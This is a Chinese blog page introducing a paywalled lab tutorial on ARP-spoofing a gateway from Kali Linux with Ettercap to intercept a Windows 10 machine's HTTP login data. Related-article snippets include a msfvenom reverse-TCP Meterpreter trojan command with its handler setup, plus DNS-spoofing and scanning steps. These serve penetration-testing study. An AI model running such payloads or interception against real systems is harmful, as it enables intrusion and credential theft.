Kali欺骗网关攻击Windows10截取数据

最新推荐文章于 2024-06-05 09:59:26 发布
置顶 最新推荐文章于 2024-06-05 09:59:26 发布
阅读量1.8k 收藏 7
点赞数 1
分类专栏: 渗透测试学习 文章标签: Kali欺骗网关攻击Windows10截取数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41709494/article/details/90316515
版权
本文介绍了如何使用Kali Linux作为欺骗网关攻击Windows10,通过替换网关MAC地址来截取电脑的上网数据。内容包括电脑上网拓扑、VirtualBox Host-Only网络配置、Windows10静态IP设置、Ettercap嗅探工具的使用,以及如何发现和截取HTTP协议的登录网页数据。
摘要由CSDN通过智能技术生成

1.电脑如何通过网关上网的拓扑图:

1-1.电脑需要通过路由器的网关才能上网 

1-2.如果网关被别人替换了MAC(物理地址),别人就可以截取你的电脑上网的数据

2.本次平台搭建的拓扑图:

3.共享网络让VirtualBox的Host-Only(仅主机模式)网络可以上网

 

 

<
了解本专栏 订阅专栏 解锁全文 超级会员免费看
路来了
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
kali实战:断网攻击
qq_44645338的博客
07-02 1万+
kali首次实战,一个简单的小案例arpspoof攻击,此篇文章仅供学习交流使用,切勿恶意攻击,造成一切问题,与我无关
Kali Linux-Metasploit入侵Windows10系统
热门推荐
冷色调的夏天的博客
08-01 3万+
Kali Linux-Metasploit入侵Windows10 写在前文 距离上一次写KALI黑客攻防的博文已是去年这个时候了 之所以再次动手写这类的文章一是因为兴趣,二是看到网上五花八门的文章都是复制粘贴过来的,而且并没有写的很清楚,因此就有了本篇博客的出现 免责声明 切勿根据本文做违法之事,如做违法之事皆于博主本人无关! 实验环境 以下环境可以是两台真实物理机,也可以是一台物理机安装虚拟机 上述两种情况我均已尝试成功,由于在一台电脑上写博文较为方便 因此之后的截图是在一台物理机上的。 KALI:(攻
如何使用kali来入侵(渗透)一台windows
最新发布
zz12345600354的博客
06-05 640
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
vmware条件下使用kali linux虚拟机对windows10进行渗透攻击的记录(学习使用)
wcf2020的博客
11-14 8907
使用kali linux虚拟机对windows10进行渗透攻击的记录 一、安装vmware tools以保证在虚拟机上创建的文件与主机可相互移动: VMware Tools是VMware虚拟机中自带的一种增强工具,是VMware提供的增强虚拟显卡和硬盘性能、以及同步虚拟机与主机时钟的驱动程序。只有在VMware虚拟机中安装好了VMware Tools,才能实现主机与虚拟机之间的文件共享,同时可支持自由拖拽的功能,鼠标也可在虚拟机与主机之间自由移动(不用再按ctrl+alt),且虚拟机屏幕也可实现...
如何查看kali的详细ip地址网关_如何防护ddos攻击
weixin_39900023的博客
12-18 712
DDOS全称Distributed Denial of Service,中文叫做“分布式拒绝服务”,就是利用大量合法的分布式服务器对目标发送请求,从而导致正常合法用户无法获得服务。DDOS会耗尽网络服务的资源,使服务器失去响应,为实施下一步网络攻击来做准备。比如用KaLi_Linux的hping3就可以很容易的实现DDOS攻击。 1. DDOS攻击的具体步骤如图,未受攻击时,netstat -na...
kali:getsploit在线抓取exploit等内容
我的学习笔记
02-28 795
资源:https://github.com/vulnersCom/getsploitVulners数据库的命令行搜索和下载工具。 它允许您在线搜索所有最受欢迎的集合的漏洞利用:Exploit-DB,Metasploit,Packetstorm等。 最强大的功能是在您的工作路径中立即开发源代码下载。支持的python版本: python2.6, pytho...
ensp加kali实现arp欺骗攻击
04-21
本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网网络模拟平台)来实现ARP欺骗攻击,并了解这种攻击可能导致的后果。 首先,我们需要理解ARP的...
十三、kali windows DVWA搭建及测试
01-15
Kali Windows环境下DVWA搭建与测试详解》 在网络安全领域,模拟真实环境进行渗透测试是提升技能的重要途径。 Damn Vulnerable Web Application (DVWA) 是一个由OWASP(Open Web Application Security Project)...
Kali Linux WiFi攻击与防护.rar
11-03
我们攻击WIFI的第一个思路就是从保密性出发,我们希望从无线系统中获取用户的明文数据。首先,我们知道WIFI的的认证加密主要有以下四种方式:OPEN(无加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。
Kali Linux Windows Penetration Testing azw3
09-27
Kali Linux Windows Penetration Testing 英文azw3 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn删除
kali壁纸,拿来当当windows壁纸也挺不错的
01-24
标题提到的"Kali壁纸",实际上指的是Kali Linux操作系统的官方壁纸,这些壁纸以其独特的设计风格和与安全相关的主题吸引着用户,即便是非Kali Linux使用者也会因为它们的美观性而将其用作Windows操作系统的桌面背景...
Win10-永恒之黑漏洞复现
网安小白的博客
09-19 2882
win10永恒之黑漏洞复现,图文详解
Kali linux渗透测试系列————20、Kali linux 漏洞映射之诊断数据库漏洞
Fly_鹏程万里
05-16 1855
前言服务提供的所有信息保存在数据库中。因此,数据库总会成为攻击者的攻击对象。本节将介绍以数据库为对象,通过网络服务和近场通信网络获取信息的工具。SQLmap:获取数据库信息sqlmap是一款开源的渗透测试工具,它可以自动搜索SQL注入漏洞,并自动化攻击数据库服务器。这款功能超强的搜索检测引擎可以从数据库的Fingerprinting(获取信息)向数据库输出数据、访问文件系统、访问频段外区域以执行O...
kali渗透测试win10
舌耳的博客
10-29 1万+
通过msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x&gt;XX.exe 把木马传过去,点开就会往自己开放的ip和端口发送一个tcp链接 在kali中 msfconsole msf &gt; use exploit/multi/handler msf exp...
在win10中快速使用kali工具进行渗透测试
小亮的博客
02-07 1万+
平时工作用windows,而做安全测试时需要用到kali中的一些工具,开虚拟机效率低。好在win10自带了一个linux子系统,不过是Ubuntu,我们需要在这个ubuntu上安装kali的工具。 一、配置打开win10专业版的linux子系统功能。 1.在windows设置-更新和安全-针对开发人员,设置为“开发人员模式” 2.在控制面板-程序-启用或关闭windows功能,勾
基于kali的dns攻击
Culprit的博客
01-30 3187
实验材料: kali攻击机 靶机 实验步骤:1.找到etter.dnsw文件路径 可以用图形界面更改文件参数,添加红框里面的内容为kali ip 然后保存 2.在/var/www/html文件夹下找到index.html 文件用自己新建的文件替换。此为自己新建主页 3.打开ettercap,选择sniff---unified sniffing 4.选择自己的网卡、可在
KALI之漏洞扫描
hacker681的博客
01-14 6611
漏洞扫描 发现漏洞 端口开放的跑的是什么服务这些端口上的服务使用的软件的版本等等的信息有了这些信息的时候可以到官方网站去比较一下最新的版本是什么版本两个比对一下你会发现有补丁列表官方修复了什么漏洞如果高危漏洞的话就可以直接控制目标系统。所以通过之前掌握的信息呢可以以此为基础对目标系统存了什么漏洞弱点来判断,这样做有很大的弊端就是扫了很多端口每个端口跑了很多服务 要忙于在大网站上面去查询官方的文档阅...
Kali linux渗透测试系列————30、Kali linux 渗透攻击之浏览器攻击
Fly_鹏程万里
05-16 983
这一部分是一个较大的话题,我之后有空的时候再来进行填补。
Kali Linux 渗透测试:扫描漏洞
William234的博客
09-04 6080
Kali Linux 渗透测试:扫描漏洞 一、使用 Nikto 扫描 Nikto 是个命令行工具,所以我们打开终端。 我们会扫描 Peruggia 漏洞应用,并导出结果到 HTML 报告: nikto -h http://192.168.56.102/peruggia/ -o result.html -h选项告诉 Nikto 扫描哪个主机,-o选项告诉
kali arp欺骗中间人攻击
08-30
中间人攻击是一种网络安全攻击技术,其中攻击者将自己置于通信的两个实体之间,以窃取或篡改通信内容。Kali Linux是一个流行的渗透测试和安全评估操作系统,它提供了各种工具来执行各种网络攻击,包括中间人攻击。 在Kali Linux中,使用ARP欺骗(Address Resolution Protocol spoofing)是一种常见的中间人攻击技术。ARP欺骗利用了网络中的ARP协议漏洞,通过发送虚假的ARP响应来欺骗目标设备,将其流量转发到攻击者控制的中间设备上。 要在Kali Linux中执行ARP欺骗中间人攻击,通常使用工具如Ettercap、Bettercap和arpspoof等。这些工具可用于欺骗目标设备,并将其流量通过攻击者的设备进行转发。然后,攻击者可以监视、篡改或窃取目标设备之间的通信。 需要注意的是,中间人攻击是非法的,除非你拥有合法的授权,并只在合法的测试环境中使用。滥用此类攻击技术可能会导致法律后果。请在遵循适用法律和道德规范的前提下,保持网络的安全和隐私。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

路来了

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值